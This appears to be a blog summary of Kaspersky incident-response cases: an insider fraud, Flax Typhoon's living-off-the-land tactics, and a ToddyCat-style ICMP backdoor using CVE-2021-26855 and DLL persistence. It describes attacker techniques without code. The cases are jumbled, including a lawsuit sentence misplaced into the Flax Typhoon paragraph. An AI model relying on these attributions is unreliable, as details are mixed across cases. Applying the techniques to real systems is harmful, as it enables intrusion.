ToddyCat is an APT group active since December 2020, targeting government and military entities in Europe and Asia. Known for sophisticated cyber-espionage, Kaspersky Lab found ToddyCat exploiting SMB, IKEEXT, and Exchange RCE to deploy an ICMP backdoor.
ToddyCat APT
In 2023, Kaspersky GERT uncovered a major internal fraud in a government organization, where threat actors used an internal service to steal over $20 million.
GERT’s DFIR analysis uncovered several attack vectors:
- A debugging interface vulnerability for cookie theft and user impersonation.
- Privilege escalation and account manipulation for fraudulent transactions.
- Unauthorized VPN access from external and internal networks.
The team connected user activities across different systems, including both local and remote IDs, to confirm that internal actors were working together.
This case highlights the critical need for strong internal controls, effective privileged access management, and comprehensive logging to identify and address insider threats in financial systems. Additionally, Kaspersky uncovered a sophisticated attack that had been ongoing in a customer’s infrastructure for over two years, revealing the depth and persistence of the intrusion.
The Flax Typhoon APT group used living-off-the-land techniques, misusing SoftEther VPN and Zabbix agent for unintended purposes. They deployed malware via Windows LOLBins like certutil and disguised services to avoid detection.
The attack involved NTDS dumping, Mimikatz, and CobaltStrike, including creating firewall rules for hidden communication. As a result, the client successfully sued the insider employee and accomplices, highlighting the critical need for APT detection solutions to identify and eliminate long-term threats.
GERT’s assessment confirmed the attack timeline, compromised users, and execution methods. The investigation revealed SMB abuse, IKEEXT service persistence, and the CVE-2021-26855 vulnerability in Microsoft Exchange Servers.
A malicious wlbsctrl.dll was used for persistence and lateral movement via SMB. An ICMP backdoor was found embedded in an application, featuring mutex checking, registry manipulation, and encrypted payload execution.
The backdoor used AES encryption with the C drive’s volume serial number as a key parameter. Payloads were injected into dllhost.exe, creating ICMP sockets, receiving Base64 data, and using encrypted shellcodes.
While the attack shows ToddyCat’s TTPs, full attribution is unclear. The case underscores the importance of asset surveillance, threat intelligence, and MDR services.
Leave A Comment